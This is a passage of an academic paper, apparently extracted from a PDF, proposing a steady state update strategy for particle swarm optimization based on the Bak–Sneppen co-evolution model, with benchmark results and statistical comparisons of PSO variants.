(InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_ae7j2j76jbaubdvmkzdpm2hype ---- Steady state particle swarm Steady state particle swarm Carlos M. Fernandes1,*, Nuno Fachada1,2,*, Juan-Julián Merelo3 and Agostinho C. Rosa1 1 LARSyS: Laboratory for Robotics and Systems in Engineering and Science, University of Lisbon, Lisbon, Portugal 2 HEI-Lab—Digital Human-Environment and Interactions Lab, Universidade Lusófona de Humanidades e Tecnologias, Lisbon, Portugal 3 Department of Architecture and Computer Technology, University of Granada, Granada, Spain * These authors contributed equally to this work. ABSTRACT This paper investigates the performance and scalability of a new update strategy for the particle swarm optimization (PSO) algorithm. The strategy is inspired by the Bak–Sneppen model of co-evolution between interacting species, which is basically a network of fitness values (representing species) that change over time according to a simple rule: the least fit species and its neighbors are iteratively replaced with random values. Following these guidelines, a steady state and dynamic update strategy for PSO algorithms is proposed: only the least fit particle and its neighbors are updated and evaluated in each time-step; the remaining particles maintain the same position and fitness, unless they meet the update criterion. The steady state PSO was tested on a set of unimodal, multimodal, noisy and rotated benchmark functions, significantly improving the quality of results and convergence speed of the standard PSOs and more sophisticated PSOs with dynamic parameters and neighborhood. A sensitivity analysis of the parameters confirms the performance enhancement with different parameter settings and scalability tests show that the algorithm behavior is consistent throughout a substantial range of solution vector dimensions. Subjects Adaptive and Self-Organizing Systems, Algorithms and Analysis of Algorithms, Artificial Intelligence, Distributed and Parallel Computing Keywords Bak–Sneppen model, Particle swarm optimization, Velocity update strategy INTRODUCTION Particle swarm optimization (PSO) is a social intelligence model for optimization and learning (Kennedy & Eberhart, 1995) that uses a set of position vectors (or particles) to represent candidate solutions to a specific problem. Every particle is evaluated by computing its fitness, after its speed and position are updated according to local and global information about the search. During the search, the particles move through the fitness landscape of the problem, following a simple set of equations that define the velocity (Eq. (1)) and position (Eq. (2)) of each particle in each time step and drive them heuristically toward optimal regions of a D-dimensional search space. Here, Eqs. (1) and (2) describe a variant proposed by Shi & Eberhart (1999) that is widely used in PSO implementations. The difference to the original PSO is the introduction of the inertia weight parameter v in order to help (together with c1 and c2) fine-tuning the balance between local and global search. All PSO implementations in this paper use inertia weight. How to cite this article Fernandes CM, Fachada N, Merelo J-J, Rosa AC. 2019. Steady state particle swarm. PeerJ Comput. Sci. 5:e202 DOI 10.7717/peerj-cs.202 Submitted 21 December 2018 Accepted 3 June 2019 Published 26 August 2019 Corresponding author Carlos M. Fernandes, cfernandes@laseeb.org Academic editor Julian Togelius Additional Information and Declarations can be found on page 28 DOI 10.7717/peerj-cs.202 Copyright 2019 Fernandes et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.202 mailto:cfernandes@�laseeb.�org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.202 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ The velocity vi,d and position xi,d of the d-th dimension of the i-th particle are therefore updated as follows: vi;d tð Þ ¼ vvi;d t � 1ð Þ þ c1r1i;d pbesti;d � xi;d t � 1ð Þ � � þ c2r2i;d gbesti;d � xi;d t � 1ð Þ � � (1) xi;d tð Þ ¼ xi;d t � 1ð Þ þ vi;d tð Þ (2) where ~Xi ¼ ðxi;1; xi;2; . . . x1;D) is the position vector of particle i; ~Vi ¼ ðvi;1; vi;2; . . . v1;D) is the velocity of particle i; ~pbesti ¼ ðpbesti;1; pbesti;2; . . . pbest1;D) is the best solution found so far by particle i; ~gbesti ¼ ðgbesti;1; gbesti;2; . . . gbest1;DÞ is the best solution found so far by the neighborhood of particle i. The neighborhood of a particle is defined by the network configuration that connects the population and structures the information flow. Parameters r1i,d and r2i,d are random numbers uniformly distributed within the range (0, 1) and c1 and c2 are the acceleration coefficients, which are used to tune the relative influence of each term of the formula. Most of the PSOs use one of two simple sociometric principles for constructing the neighborhood network (which defines the~gbest values). Gbest (where g stands for global) connects all the members of the swarm to one another. The degree of connectivity of gbest is k = n, where n is the number of particles. Lbest (where l stands for local), creates a neighborhood with the particle itself and its k nearest neighbors. A particular case of the lbest topology is the ring structure, in which the particles are arranged in a ring, with a degree of connectivity k = 3, including the particle itself. Between the k = 3 connectivity of lbest ring and k = n of gbest, there are several possibilities. Two of the most used are the two-dimensional square lattices with von Neumann and Moore neighborhoods. Usually, PSOs are synchronous, meaning that first, the fitness values of all vectors must be computed, and only then their velocity is updated. However, there is another possible approach, in which the velocity of the particles is updated immediately after computing the fitness. In this case, the particles move with incomplete knowledge about the global search: if, for instance, the underlying network connecting the particles is a regular graph, then, on average, each particle is updated knowing the current best position found by half of its neighbors and the previous best found by the other half. This variant, which is called asynchronous PSO (A-PSO), was tested by Carlisle & Dozier (2001). In the paper, the authors claim that A-PSO yields better results than the synchronous version (i.e., S-PSO), but since then other authors reached different conclusions: Engelbrecht (2013) and Rada-Vilela, Zhang & Seah (2013), for instance, reported that S-PSO is better than A-PSO in terms of the quality of the solutions and convergence speed. The importance of investigating update strategies for PSO lies in the possibility of distributed computation (McNabb, 2014). Even though standard PSOs can be easily parallelized—a particle or a set of particles can be assigned to each processor, for instance—, load imbalances may cause an inefficient use of the computational resources if synchronous updates are used. Asynchronous strategies do not require that all particles in the population have perfect knowledge about the search before the update step (a requirement that may cause idle processor times in a synchronous implementation), and therefore are a valid approach for parallelizing particle swarms. In addition, Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 2/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ asynchronism can also be useful in preventing premature convergence (Aziz et al., 2014), or to speed up convergence by skipping function evaluations (Majercik, 2013). Here, we are mainly concerned with performance issues, in general, and convergence speed in particular. The goal is to design an A-PSO that, unlike the standard A-PSO, significantly improves on the convergence speed of S-PSO in a wide range of problems. We hypothesize that reducing the number of evaluations in each time step, while focusing only on harder cases (i.e., worst solutions), reduces the total number of evaluations required to converge to a specific criterion, that is, the computational effort to reach a solution. With that objective in mind, we have designed and implemented a novel strategy for one of the fundamental mechanisms of PSO: the velocity update strategy. Following the nature of the method, the algorithm has been entitled steady state PSO (SS-PSO). In systems theory, a system is said to be in steady state when some of its parts do not change for a period of time (Baillieul & Samad, 2015). SS-PSO only updates and evaluates a fraction of the population in each time step: the worst particles and its neighbors, thus imposing a kind of selection pressure upon the whole population. The other particles remain in the same position until they eventually fulfill the criterion (being the worst particle or one of its neighbors). Steady state replacement strategies are common in other population-based metaheuristics, namely Evolutionary Algorithms (Whitley & Kauth, 1988). However, steady state populations are much less frequent in PSO (Majercik, 2013; Fernandes et al., 2014; Allmendiger, Li & Branke, 2008). In fact, the strategy proposed in this paper is, to the extent of the authors’ knowledge, the first that uses dynamic steady state update coupled with selective pressure. Furthermore, results demonstrate that the criterion for selecting the pool of individuals to update is very important for the success of the update strategy: the update step should be restricted to the worst individuals and their neighbors for optimizing performance. With this design, the steady state update strategy is not only able to improve the convergence speed of PSO standard configurations, but also more sophisticated variants of the algorithm, such as PSOs with time-varying parameters (Ratnaweera, Halgamuge & Watson, 2004) and dynamic neighborhood (Vora & Mirlanalinee, 2017). The strategy was inspired by the Bak–Sneppen model of co-evolution between interacting species and by the theory of self-organized criticality (SOC) (Bak & Sneppen, 1993). SOC is a property of some systems that have a critical point as an attractor. However, unlike classical phase transitions, where a parameter needs to be tuned for the system to reach critical point, SOC systems spontaneously reach that critical state between order and randomness. In a SOC system near the critical point, small disturbances can cause changes of all magnitudes. These events, which are spatially or temporally spread through the system, are known as avalanches. Avalanches occur independently of the initial state. Moreover, the same perturbation may cause small or large avalanches, depending on the current state of the system—that is, its proximity to the critical point. The distribution of avalanches during a large period displays a power-law between their size and frequency: small avalanches occur very often while large events that reconfigure almost the entire system are scarcer. SOC complex Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 3/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ systems balance between stability and creative destruction. In fact, power-law relationships between the size of events and their frequency, one of SOC’s signatures, are widespread in Nature. Earthquake distribution, for instance, follows the Gutenberg-Richter law (Gutenberg & Richter, 1956), a power-law proportion between the magnitude of the earthquakes that occurred in a specific area during a specific period of time, and the frequency of those earthquakes. Self-organized criticality was studied for the first time in the sandpile model (Bak, Tang & Wiesenfeld, 1987). Since then, the concept has been extended to other complex systems: besides the aforementioned earthquakes, the proponents of the theory claim that SOC may be a link between a broad range of phenomena, like forest-fires, ecosystems, financial markets and the brain (Bak, 1996). One of such systems is the Bak–Sneppen model of co-evolution between interacting species (Bak & Sneppen, 1993). The Bak–Sneppen model was developed with the main objective of trying to understand the mechanisms underlying mass extinctions in nature. Ecosystems are complex adaptive systems in which the agents (the natural species) are related through several features, like food chains or symbiosis, for instance. In such interconnected environments, the extinction of one species affects the species that are related to it, in a chain reaction that can be of any size: in fact, fossil records suggest that the size of extinction outbreaks is in power-law proportion to their frequency. In order to model the extinction patterns in nature and search for SOC signatures in co-evolutionary systems, Bak & Sneppen (1993) structured a set of species in a ring network and assigned a fitness value to each. Then, in every time step, the least fit species and its neighbors are eliminated from the system and replaced by individuals with random fitness. To put it in mathematical terms, the system is defined by n fitness values arranged as a ring (ecosystem). At each time step, the smallest value and its two neighbours are replaced by uncorrelated random values drawn from a uniform distribution. Operating with this set of rules, the system is driven to a critical state where most species have reached a fitness value above a certain threshold. Near the critical point, extinction events of all scales can be observed. Self-organized criticality theory has been a source of inspiration for metaheuristics and unconventional computing techniques. Extremal optimization (EO) (Boettcher & Percus, 2003), for example, is based in the Bak–Sneppen model. EO uses a single solution vector that is modified by local search. The algorithm removes the worst components of the vector and replaces them with randomly generated material. By plotting the fitness of the solution, it is possible to observe distinct stages of evolution, where improvement is disturbed by brief periods of dramatic decrease in the quality. Løvbjerg & Krink (2002) modeled SOC in a PSO in order to control the convergence of the algorithm and maintain population diversity. The authors claim that their method is faster and attains better solutions than the standard PSO. However, the algorithm adds several parameters to the standard PSO parameter set: overall five parameters must be tuned or set to constant ad hoc values. Complex and dynamic population structures have been one of most popular PSO research areas in the last decade. The comprehensive-learning PSO (CLPSO) (Liang et al., 2006; Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 4/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ Lynn & Suganthan, 2015) abandons the global best information, replacing it by a complex and dynamic scheme that uses all other particles’ past best information. The algorithm significantly improves the performance of other PSOs on multimodal problems. Ratnaweera, Halgamuge & Watson (2004) propose new parameter automation strategies that act upon several working mechanisms of the algorithm. The authors introduce the concepts of time-varying acceleration coefficients (PSO-TVAC) and also mutation, by adding perturbations to randomly selected modulus of the velocity vector. Finally, the authors describe a self-organizing hierarchical particle swarm optimizer with time-varying acceleration coefficients, which restricts the velocity update policy to the influence of the cognitive and social part, reinitializing the particles whenever they are stagnated in the search space. Liu, Du & Wang (2014) describe a PSO that uses a scale-free (SF) network for connecting the individuals. SF-PSO attains a better balance between solution quality and convergence speed when compared to standard PSOs with gbest and lbest neighborhood topology. However, the algorithm is not compared under more sophisticated frameworks or against state-of-the art PSOs. Furthermore, the size of the test set is small and does not comprise shifted or rotated functions. Finally, Vora & Mirlanalinee (2017) propose a dynamic small world PSO (DSWPSO). Each particle communicates with the four individuals of its von Neumann neighborhood, to which two random connections are added (and then removed) in each time step. In other words, the neighborhood of each particle is comprised of six particles, four of them fixed throughout the run while the remaining two keep changing. The authors compare the performance of DSWPSO with other PSOs and conclude that due to a more balanced exploration and exploitation trade-off, DSWPSO is consistently better. In this work, the Bak–Sneppen model is used to design an alternative update strategy for the PSO. The strategy has been previously tested on a set of benchmark functions and compared to a standard S-PSO (Fernandes, Merelo & Rosa, 2016). The results show that SS-PSO significantly improves the performance of a S-PSO structured in a two-dimensional square lattice with Moore neighborhood. This paper is an extension of the aforementioned work. The main contributions here are: (a) a complete statistical analysis of the performance, comparing the algorithm with standard PSOs and variations of the proposed strategy; (b) a parameter sensitivity analysis and scalability tests showing that the performance enhancement introduced by the steady-state strategy is maintained throughout a reasonable range of parameter values and search space dimension ranging from 10 to 50; and (c) a comparison with state-of-the-art dynamic PSOs: CLPSO, PSO-TVAC and DSWPSO. MATERIALS AND METHODS SS-PSO algorithm Steady state PSO was inspired by a similarity between PSO and the Bak–Sneppen model: both are population models in which the individuals are structured by a network and evolve toward better fitness values. With this likeness in mind, we have devised an Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 5/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ asynchronous and steady state update strategy for PSO in which only the least fit particle and its neighbors are updated and evaluated in each time step. Please note that SS-PSO is not an extinction model like the Bak–Sneppen system: the worst particle and its neighbors are not replaced by random values; they are updated according to Eqs. (1) and (2). As for the other particles, they remain steady—hence the name of the algorithm: SS-PSO. The particles to be updated are defined by the social structure. For instance, if the particles are connected by a lbest topology with k = 3, then only the worst particle and its two nearest neighbors are updated and evaluated. Please note that local synchronicity is used here: the fitness values of the worst and its neighbors are first computed and only then the particles update their velocity. For the remaining mechanisms and parameters, the algorithm is exactly as a standard PSO. For a detailed description of SS-PSO, please refer to Algorithm 1. The PSOs discussed in this paper, including the proposed SS-PSO, are available in the OpenPSO package, which offers an efficient, modular and multicore-aware framework for experimenting with different approaches. OpenPSO is composed of three modules: 1. A PSO algorithm library. 2. A library of benchmarking functions. 3. A command-line tool for directly experimenting with the different PSO algorithms and benchmarking functions. The library components can be interfaced with other programs and programming languages, making OpenPSO a flexible and adaptable framework for PSO research. Its source code is available at https://github.com/laseeb/openpso. Algorithm 1 Steady state particle swarm optimization. for all particles i 2 1; 2 . . . mf g do initialize velocity and position of particle i compute fitness of particle i end for all particles i 2 1; 2 . . . mf g do compute pbest and gbest of particle i end repeat update velocity (Eq. (1)) of particle with worst fitness and its neighbors update position (Eq. (2)) of particle with worst fitness and its neighbors compute fitness of particle with worst fitness and its neighbors for all particles i 2 1; 2 . . . mf g do compute pbest and gbest of particle i until termination criterion is met Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 6/30 https://github.com/laseeb/openpso http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ Experimental setup For testing the algorithm, 10 benchmark problems (Table 1) are used. Functions f1–f3 are unimodal; f4–f8 are multimodal; f9 is the shifted f2 with noise and f10 is the rotated f5 (f9 global optimum and f10 matrix were taken from the CEC2005 benchmark). Population size m is set to 49. This particular value, which lies within the typical range (Kennedy & Eberhart, 1995), was set in order to construct square lattices with von Neumann and Moore neighborhood. Following (Rada-Vilela, Zhang & Seah, 2013), c1 and c2 were set to 1.494 and v to 0.7298. Xmax, the maximum position value, and Vmax, the maximum velocity value, are defined by the domain’s upper limit. Asymmetrical initialization is used, with the initialization ranges in Table 1. Each algorithm was executed 50 times with each function and statistical measures were taken over those 50 runs. Stop criteria have been defined according to the functions and objectives of the experiments (see details in the section “Results”). This work reports an extensive study of the proposed methodology. Different kinds of experiments have been performed, each one to investigate different aspects of the steady-state update strategy. The first experiment attempts at a proof-of-concept: SS-PSO Table 1 Benchmark functions. Mathematical representation Range of search/initialization Stop criterion Sphere f1 f1 ~xð Þ ¼ PD i¼1 xi 2 (-100, 100)D (50, 100)D 0.01 Quadric f2 f2 ~xð Þ ¼ PD i¼1 Pi j¼1 xj !2 (-100, 100)D (50, 100)D 0.01 Hyper Ellipsoid f3 f1 ~xð Þ ¼ PD i¼1 ixi 2 (-100, 100)D (50, 100)D 0.01 Rastrigin f4 f4 ~xð Þ ¼ PD i¼1 xi 2 � 10 cos 2pxið Þ þ 10ð Þ (-10, 10)D (2.56, 5.12)D 100 Griewank f5 f5 ~xð Þ ¼ 1 þ 14; 000 PD i¼1 xi 2 � QD i¼1 cos xiffi i p � � (-600, 600)D (300, 600)D 0.05 Schaffer f6 f6 ~xð Þ ¼ 0:5 þ sin ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi x2 þ y2 p� �2 � 0:5 1:0 þ 0:001 x2 þ y2ð Þð Þ2 (-100, 100)2 (15, 30)2 0.00001 Weierstrass f7 f7 ~xð Þ ¼ PD i¼1 Pkmax k¼0 ak cos 2pbk xi þ 0:5ð Þ � �� D Pkmax k¼0 ak cos 2pbk � 0:5 � �� ; a ¼ 0:5; b ¼ 3; kmax ¼ 20 (-0.5, 0.5)D (-0.5, 0.2)D 0.01 Ackley f8 f8 ~xð Þ ¼ �20 exp �0:2 ffiffiffiffiffiffiffiffiffiffiffiffiffiffi 1 D PD i¼1 x2i s ! � exp 1D PD i¼1 cos 2pxið Þ þ 20 þ e (-32.768, 32.768)D (2.56, 5.12)D 0.01 Shifted Quadric with noise f9 f9 ~zð Þ ¼ PD i¼1 Pi j¼1 zj !2 � 1 þ 0:4jN 0; 1ð Þjð Þ; ~z ¼ ~x �~o, ~o ¼ o1; ::oD½ �: shifted global optimum (-100, 100)D (50, 100)D 0.01 Rotated Griewank f10 f10 ~zð Þ ¼ 1 þ 14; 000 PD i¼1 z2i � QD i¼1 cos ziffi i p � � , ~z ¼ M~x, M: orthogonal matrix (-600, 600) D (300, 600)D 0.05 Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 7/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ is compared with standard (and synchronous) update strategies. The objective of the second experiment is to check if the convergence speed-up is caused indeed by the selective strategy or instead by the restricted evaluation pool, which is a consequence of the proposed method. The third test aims at studying the parameter sensitivity and the scalability with problem size. For that purpose, several tests have been conducted in a wide range of parameter values and problem dimension. The fourth experiment investigates SS-PSO under time-varying parameters and experiment number five compares SS-PSO with dynamically structured PSOs. RESULTS Proof-of-concept The first experiment intends to determine if SS-PSO is able to improve the performance of a standard S-PSO. For that purpose, three S-PSOs with different topologies have been implemented: lbest with k = 3 (or ring) and two-dimensional square lattices with von Neumann (k = 5) and Moore neighborhood (k = 9). Gbest k = n is not included in the comparisons because SS-PSO uses the neighborhood structure to decide how many and which particles to update: for instance, in the von Neumann topology (k = 5), five particles are updated. Since gbest has k = n, the proposed strategy would update the entire population, that is, it would be equivalent to a S-PSO. Therefore, we have restricted the study to lbest, von Neumann and Moore structures, labeling the algorithms, respectively, S-PSOlbest, S-PSOVN and S-PSOMoore. Two sets of experiments were conducted. First, the algorithms were run for a specific amount of function evaluations (49,000 for f1, f3 and f6, 980,000 for the remaining). After each run, the best solution was recorded. In the second set of experiments the algorithms were all run for 980,000 function evaluations or until reaching a function-specific stop criterion (given in Table 1). A success measure was defined as the number of runs in which an algorithm attains the stop criterion. This experimental setup is similar to those in Kennedy & Mendes (2002) and Rada-Vilela, Zhang & Seah (2013). The dimension of Table 2 Median, minimum and maximum best fitness (50 runs). S-PSOlbest S-PSOVN S-PSOMoore Median Min Max Median Min Max Median Min Max f1 4.57e-06 9.44e-07 2.83e-05 9.13e-10 1.68e-10 6.70e-09 5.05e-12 8.81e-13 4.43e-11 f2 5.39e-13 3.09e-15 1.57e-11 4.52e-23 3.06e-25 2.81e-21 1.18e-30 1.01e-33 9.41e-28 f3 3.01e-05 8.44e-06 1.65e-04 5.58e-09 1.16e-09 4.60e-08 2.53e-11 3.08e-12 1.94e-10 f4 1.09e+02 6.57e+01 1.53e+02 6.02e+01 3.38e+01 1.09e+02 5.17e+01 3.78e+01 1.13e+02 f5 0.00e00 0.00e00 7.40e-03 0.00e00 0.00e00 5.38e-02 0.00e00 0.00e00 4.92e-02 f6 0.00e00 0.00e00 9.72e-03 0.00e00 0.00e00 0.00e00 0.00e00 0.00e00 9.72e-03 f7 0.00e00 0.00e00 0.00e00 0.00e00 0.00e00 3.29e-02 9.03e-04 0.00e00 1.12e00 f8 1.33e-15 8.88e-16 1.33e-15 1.33e-15 8.88e-16 1.33e-15 8.88e-16 8.88e-16 1.33e-15 f9 1.74e+02 3.41e+01 1.07e+03 4.76e-02 4.87e-04 2.05e+02 9.80e-05 6.44e-07 1.64e+03 f10 0.00e00 0.00e00 9.86e-03 0.00e00 0.00e00 3.19e-02 7.40e-03 0.00e00 5.19e-01 Note: Best median fitness among the three algorithms shown in bold. Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 8/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ the functions search space is D = 30 (except f6, with D = 2). The results are in Table 2 (fitness), Table 3 (evaluations) and Table 4 (success rates). The best results among the three algorithms are shown in bold. When compared to S-PSOlbest, S-PSOMoore attains better solutions (considering median values of fitness distributions over 50 runs) in most of the functions and is faster (considering median values of evaluations required to meet the criteria) in every function. When compared to S-PSOVN, S-PSOMoore is faster in every function and yields better median fitness values in unimodal functions. In terms of success rates, S-PSOMoore clearly outperforms the other topologies in function f9, and is much more efficient than S-PSOlbest in function f4. These results are consistent with Kennedy & Mendes (2002). The algorithms were ranked by the Friedman test for each function. Table 5 shows the ranks according to the quality of solutions, while Table 6 shows the ranks according to Table 3 Median, minimum and maximum evaluations required to meet the criteria (50 runs). S-PSOlbest S-PSOVN S-PSOMoore Median Min Max Median Min Max Median Min Max f1 32,511.5 30,135 34,937 23,544.5 21,952 24,990 20,212 18,669 22,050 f2 365,270 313,551 403,858 217,854 188,111 242,893 173,117 142,688 194,530 f3 36,799 34,496 40,425 26,827 25,029 29,253 23,104 21,462 24,353 f4 77,518 21,462 866,173 15,582 9,604 74,872 13,524.0 7,448 49,392 f5 31,213 27,244 34,594 22,736 20,188 25,333 19,379.5 17,248 23,765 f6 18,865 5,243 145,334 12,323.5 3,626 80,213 7,105.0 3,822 39,788 f7 62,377 56,399 69,776 41,356 37,191 45,766 33,492 31,801 42,973 f8 35,206.5 31,556 39,249 24,206 22,834 28,928 20,923.0 19,012 24,794 f9 – – – 883,911 758,961 976,962 706,972 453,201 922,327 f10 33,001.5 30,331 37,926 24,157 21,805 26,460 21,021 18,865 29,939 Note: Best median number of evaluations among the three algorithms shown in bold. Table 4 Success rates. S-PSOlbest S-PSOVN S-PSOMoore f1 50 50 50 f2 50 50 50 f3 50 50 50 f4 17 49 49 f5 50 50 50 f6 50 50 50 f7 50 47 34 f8 50 50 50 f9 6 9 47 f10 50 50 47 Note: Best success rate among the three algorithms shown in bold. Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 9/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ the convergence speed (only the functions on which the three algorithms attained the same success rates were considered in the ranking by convergence speed). Overall, S-PSOMoore ranks first in terms of solutions quality and convergence speed—see Fig. 1. Therefore, we conclude that the Moore structure is well suited for assessing the validity and relevance the SS-PSO. Once the best network has been found for this particular set of problems, the next step was to compare synchronous and A-PSOs on the most efficient topology. For that purpose, we have implemented a SS-PSOMoore and tested it on the 10-function set under the same conditions described above. The results can be found in Table 7. Table 8 gives a comparison between the performance of S-PSOMoore and SS-PSOMoore based on the numerical results and statistical analysis of those same results. The non- parametric Mann–Whitney test was used to compare the distribution of fitness values and number of evaluations to meet criteria of each algorithm in each function. The ranking of fitness distributions are significant at P � 0.05 for f1, f2, f3, f6, f7, f9, that is, in these functions, the null hypothesis that the two samples come from the same population is rejected. For the remaining functions (f5, f8, f10), the null hypothesis is not rejected: the differences are not significant. Table 5 Fitness rank by Friedman test (with 0.05 significance level). The table gives the rank of each algorithm and in parenthesis the algorithms to which the differences are significant according to the Friedman test. S-PSOlbest (1) S-PSOVN (2) S-PSOMoore (3) P-value f1 3.0 (2) (3) 2.0 (1) (3) 1.0 (1) (2) <0.0001 f2 3.0 (2) (3) 2.0 (1) (3) 1.0 (1) (2) <0.0001 f3 3.0 (2) (3) 2.0 (1) (3) 1.0 (1) (2) <0.0001 f4 2.98 (2) (3) 1.47 (1) 1.55 (1) <0.0001 f5 1.57 (2) (3) 2.03 (1) (2) 2.40 (1) (3) <0.0001 f6 2.24 (2) (3) 1.94 (1) 1.82 (1) 0.00025 f7 1.57 (3) 1.78 (3) 2.65 (1) (3) <0.0001 f8 2.44 (2) (3) 1.96 (1) (3) 1.60 (1) (2) <0.0001 f9 2.96 (2) (3) 1.98 (1) (3) 1.06 (1) (2) <0.0001 f10 1.61 (2) (3) 1.99 (2) (3) 2.40 (1) (2) <0.0001 Table 6 Convergence speed rank by Friedman test (with 0.05 significance level). The table gives the rank of each algorithm and in parenthesis the algorithms to which the differences are significant according to the Friedman test. S-PSOlbest (1) S-PSOVN (2) S-PSOMoore (3) P-value f1 3.0 (2) (3) 1.99 (1) (3) 1.01 (1) (2) <0.0001 f2 3.0 (2) (3) 1.98 (1) (3) 1.02 (1) (2) <0.0001 f3 3.0 (2) (3) 1.99 (1) (3) 1.01 (1) (2) <0.0001 f5 3.0 (2) (3) 1.96 (1) (3) 1.04 (1) (2) <0.0001 f6 2.35 (3) 2.07 (3) 1.58 (1) (2) 0.00039 f8 3.00 (2) (3) 2.00 (1) (3) 1.00 (1) (2) <0.0001 Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 10/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ In terms of function evaluations, SS-PSOMoore is faster in the entire set of unimodal problems. In multimodal problems, SS-PSOMoore needs less evaluations in f5, f6, f7 and f8. Results of Mann–Whitney tests are significant at P � 0.05 for functions f1, f2, f3, f5, f7, f8, f9 and f10—see Table 8. The success rates are similar, except for f7 (in which SS-PSO clearly outperforms the standard algorithm) and f9. In conclusion: empirical results, together with statistical tests, show that according to accuracy, speed and reliability, SS-PSOMoore outperforms (A) fitness (B) convergence speed 1.0 1.5 2.0 2.5 3.0 lbest VN Moore 1.0 1.5 2.0 2.5 3.0 lbest VN Moore Figure 1 S-PSOlbest, S-PSOVN and S-PSOMoore: solutions quality (A) and convergence speed (B) rank by the Friedman test. Full-size DOI: 10.7717/peerj-cs.202/fig-1 Table 7 SS-PSOMoore results: solutions quality, convergence speed and success rates. Fitness Evaluations Median Min Max Median Min Max SR f1 5.42e-15 3.45e-16 6.49e-14 17,019 15,327 18,819 50 f2 7.18e-54 8.41e-60 4.87e-49 133,191 102,258 163,251 50 f3 2.99e-14 1.15e-15 2.97e-13 19,768.5 17,460 21,069 50 f4 5.12e+01 2.19e+01 1.04e+02 14,256 7,659 58,248 49 f5 7.40e-03 0.00e00 3.69e-02 16,884 14,814 24,291 50 f6 0.00e00 0.00e00 0.00e00 6,381 2,727 21,744 50 f7 0.00e00 0.00e00 1.32e-01 30,717 28,089 34,254 48 f8 8.88e-16 8.88e-16 1.33e-15 17,752.5 15,750 19,809 50 f9 1.01e-05 1.73e-08 7.11e-04 671,175 425,655 852,786 50 f10 3.70e-03 0.00e00 5.24e-01 17,662.5 15,669 27,252 48 Table 8 Comparing S-PSOMoore and SS-PSOMoore with the Mann–Whitney test. f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 Fitness + + + ≈ ≈ + + ≈ + ≈ Evaluations + + + ≈ + ≈ + + + + Notes: +If SS-PSOMoore ranks first in the Mann–Whitney test and the result is significant. ≈If the differences are not significant. Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 11/30 http://dx.doi.org/10.7717/peerj-cs.202/fig-1 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ S-PSOMoore in most of the benchmark functions selected for this test, while not being outperformed in any case. Update strategy The preceding tests show that the steady state update strategy when implemented in a PSO structured in a lattice with Moore neighborhood improves its performance. The following experiment aims at answering an important question: what is the major factor in the performance enhancement? Is it the steady state update, or instead the particles that are updated? In order to investigate this issue, two variants of SS-PSO were implemented: one that updates the best particle and its neighbors (replace-best); and another that updates a randomly selected particle and its neighbors (replace-random). The algorithms were tested on the same set of benchmark functions and compared the proposed SS-PSOMoore (or replace-worst). Results are in Table 9. Replace-best update strategy is outperformed by replace-worst SS-PSO. With the exception of f1 and f3, the quality of solutions is degraded when compared to the proposed SS-PSO. However, success rates are considerably lower in most functions, including f1 and f3. Please note that functions f1 and f3 are unimodal and therefore they can be easily solved by hill-climbing and greedy algorithms. It is not surprising that a greedy selective strategy like SS-PSO with replace-best can find very good solutions in some runs. However, for more difficult problem, replace-best is clearly unable to find good solutions. As for replace-random, it improves S-PSO in some functions, but in general is not better than replace-worst: replace-random SS-PSO is less accurate and slower in most of the functions. The Friedman test shows that SS-PSO with replace-worst strategy ranks first in terms of solutions quality—see Fig. 2. Table 10 compares replace-random and replace-worst with the assistance of Mann–Whitney statistical tests. Except for f4, replace-worst is significantly more efficient Table 9 Results of SS-PSO variants: median, min, max and success rates (SR). SS-PSOMoore (replace-best) SR SS-PSOMoore (replace-random) SR Fitness Evaluations Fitness Evaluations Median Min Max Median Min Max Median Min Max Median Min Max f1 4.09e-29 2.50e-33 2.00e+04 9,468 6,714 24,669 45 6.04e-14 7.86e-14 6.59e-12 18,972 16,425 20,781 50 f2 1.50e+04 4.12e-89 3.50e+04 66,307 64,251 68,364 2 